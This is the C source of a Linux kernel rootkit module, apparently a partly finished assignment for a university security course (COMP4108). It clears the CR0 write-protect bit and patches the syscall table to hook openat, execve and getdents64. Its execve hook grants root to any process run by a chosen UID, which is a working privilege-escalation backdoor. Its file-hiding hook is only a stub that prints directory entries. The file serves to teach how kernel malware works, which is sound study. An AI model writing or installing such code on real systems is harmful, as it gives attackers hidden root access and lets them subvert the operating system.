/*
 * COMP4108 Rootkit Framework
*/

#include <linux/sched.h>
#include <linux/module.h>
#include <linux/syscalls.h>
#include <linux/dirent.h>
#include <linux/slab.h>
#include <linux/version.h>
#include <linux/proc_ns.h>
#include <linux/fdtable.h>
#include <linux/kallsyms.h>
#include <linux/kernel.h>

#ifndef __NR_getdents
#define __NR_getdents 141
#endif

#ifndef __NR_execve
#define __NR_execve 11
#endif

#ifndef __NR_getdents64
#define __NR_getdents64 248
#endif

#define MODULE_NAME "rootkit"

// The linux dirent structure for Part C
struct linux_dirent {
        unsigned long   d_ino;
        unsigned long   d_off;
        unsigned short  d_reclen;
        char            d_name[1];
        char            pad;
        char            d_type;
};

unsigned long cr0;
static unsigned long *__sys_call_table;

typedef asmlinkage long (*t_syscall)(const struct pt_regs *);

static t_syscall original_openat; // create a variable to store the original openat function
static t_syscall original_execve; // create a variable to store the original execve function
static t_syscall original_getdents64; // create a variable to store the original getdents64 function


/*
 * The suffix to use for the openat hook code. This is the file extension
 * we will be detecting. See insert.sh for how this is passed to the rootkit.
*/
static char* suffix;
module_param(suffix, charp, 0);
MODULE_PARM_DESC(suffix, "Received suffix parameter");

/*
 * When a user with an effective UID = root_uid runs a command via execve()
 * we make our hook grant them root priv. root_uid's value is provided as a
 * kernel module argument.
 */
static unsigned int root_uid;
module_param(root_uid, uint, 0);
MODULE_PARM_DESC(root_uid, "The user to esclate the privileges of.");


//******
//TODO: NEEDED FOR PART C
//	Accept magic_prefix as a kernel module parameter
//	(see module_parm() example above)
//******
/*
 * Files that start with a prefix matching magic_prefix are removed from the
 * linux_dirent64* buffer that is returned to the caller of getdents()
 */
static char* magic_prefix;

/*
 * Locates the address of the system call table using kallsyms_lookup_name
 * and returns it as an unsigned long *
*/
unsigned long * get_syscall_table_bf(void){
  unsigned long *syscall_table;
  syscall_table = (unsigned long*)kallsyms_lookup_name("sys_call_table");
  return syscall_table;
}


/*
 * Our version of the syscall is defined here. We want to match the return type
 * and argument signature of the original syscall.
 * 
 * This is an example of how to hook openat(). Our version will print to the
 * kernel which file the function was called for.
*/
asmlinkage int new_openat(const struct pt_regs* regs){
  // Declare our return value and a variable to store the filename
  long ret;
  char *filename;
  size_t filename_len;
  size_t suffix_len;

  // Get the filename the syscall was called for
  filename = kmalloc(4096, GFP_KERNEL); // alocate kernel memory

  // copy the filename into the kernel variable
  if (strncpy_from_user(filename, (void*) regs->si, 4096) < 0){
    kfree(filename);
    return 0;
  }

  // Check if the file is a .txt (has the .txt extension)
  filename_len = strlen(filename);
  suffix_len = strlen(suffix);
  if (filename_len >= suffix_len){
    if (strncmp(filename + (filename_len - suffix_len), suffix, suffix_len) == 0){
      printk(KERN_INFO "openat() called for %s\n", filename);
    }
  }

  kfree(filename);

  // Invoke the original openat syscall
  ret = original_openat(regs);

  return ret;
}


asmlinkage int new_execve(const struct pt_regs* regs){
  // Declare the variables we will need
  long ret;
  uid_t orig_euid;
  struct cred *new_creds;
  char *filename;

  // Get the filename the syscall was called for
  filename = kmalloc(4096, GFP_KERNEL); // allocate kernel memory

  /*
   * Copy the filename into the kernel variable.
   * The signature for execve is execve(filename, argv, envp),
   * we are interested in filename, the first parameter,
   * which will be passed in rdi.
   */
  if (strncpy_from_user(filename, (void*) regs->di, 4096) < 0){
    kfree(filename);
    return 0;
  }

  // Print the file being executed
  printk(KERN_INFO "Executing %s\n", filename);

  // Clean up the memory we allocated
  kfree(filename);

  // Get and rint the effective UID of the user executing the file
  orig_euid = current_euid().val;
  printk(KERN_INFO "Effective UID %u\n", orig_euid);

  // If orig_euid == root_uid, escalate privileges
  if (orig_euid == root_uid){
    printk(KERN_INFO "Adjusting privileges...");

    // Make a copy of the task's credentials for editing
    new_creds = prepare_creds();

    // Grant superuser privileges
    new_creds->euid.val = 0;
    new_creds->uid.val = 0;

    // Commit our change
    commit_creds(new_creds);
  }

  // Invoke the original execve syscall
  ret = original_execve(regs);

  return ret;
}

asmlinkage int new_getdents64(const struct pt_regs* regs){
  // Declare the variables we will need
  long ret;
  long orig_len;
  void* dirp;
  void* it;

  // Run the original getdents64; we will inspect (and eventually modify) its result
  ret = original_getdents64(regs);

  // Perform no further actions if the call failed or end-of-directory was reached
  if (ret <= 0)
    return ret;

  // At this point, we know the return value is the number of bytes written
  orig_len = ret;

  /*
   * We will start by copying the userspace buffer the real syscall filled to kernel
   * mode for manipulation. First, we allocate a buffer of the right size. The return
   * value of getdents64() is the number of bytes written, so we will use that.
   */
  dirp = kmalloc(ret, GFP_KERNEL);

  /*
   * The signature for getdents64 is getdents64(fd, dirp, count).
   * dirp is the userspace buffer that was filled with directory entries.
   * It is the second parameter, so it was passed in rsi.
   */
  if (copy_from_user(dirp, (void*) regs->si, orig_len) < 0){
    kfree(dirp);
    return ret;
  }

#define ent ((struct linux_dirent64*) it)
  printk(KERN_INFO "getdents64() hook invoked.\n");
  for (it = dirp; it < dirp + orig_len; it += ent->d_reclen) {
    printk(KERN_INFO "entry: %s\n", ent->d_name);
  }
#undef ent

  // Release the kernel-mode memory we allocated
  kfree(dirp);

  return ret;
}


/*
 * Used to let us modify memory regions and syscalls
*/
static inline void write_cr0_forced(unsigned long val){
  unsigned long __force_order;
  asm volatile(
    "mov %0, %%cr0"
    : "+r"(val), "+m"(__force_order));
}

/*
 * Protect memory (so it can't be modified)
*/
static inline void protect_memory(void){
  write_cr0_forced(cr0);
}

/*
 * Unprotect memory (so we can modify it)
*/
static inline void unprotect_memory(void)
{
  write_cr0_forced(cr0 & ~0x00010000);
}

/*
 * Module initalization
*/
static int __init init_rootkit(void)
{
  printk(KERN_INFO "Rootkit module initializing.\n");

  __sys_call_table = get_syscall_table_bf(); // Get the sys_call_table information

  if (!__sys_call_table)
    return -1;

  cr0 = read_cr0();

  // Let's store the original functions so they can be restored later
  original_openat = (t_syscall)__sys_call_table[__NR_openat];
  original_execve = (t_syscall)__sys_call_table[__NR_execve];
  original_getdents64 = (t_syscall)__sys_call_table[__NR_getdents64];

  unprotect_memory();

  __sys_call_table[__NR_openat] = (unsigned long) new_openat;

  // Let's hook execve() for privilege escalation
  __sys_call_table[__NR_execve] = (unsigned long) new_execve;

  // Let's hook getdents() to hide our files
  __sys_call_table[__NR_getdents64] = (unsigned long) new_getdents64;

  protect_memory();

  printk(KERN_INFO "Rootkit module is loaded!\n");
  return 0; // For successful load
}

static void __exit cleanup_rootkit(void){
  printk(KERN_INFO "Rootkit module is unloaded!\n");

  unprotect_memory();

  __sys_call_table[__NR_openat] = (unsigned long)original_openat;
  __sys_call_table[__NR_execve] = (unsigned long)original_execve;
  __sys_call_table[__NR_getdents64] = (unsigned long)original_getdents64;

  protect_memory();

  printk(KERN_INFO "Rootkit module cleanup copmlete.\n");
}

module_init(init_rootkit);
module_exit(cleanup_rootkit);

MODULE_AUTHOR("Your Friendly Neighbourhood Hacker");
MODULE_LICENSE("GPL");
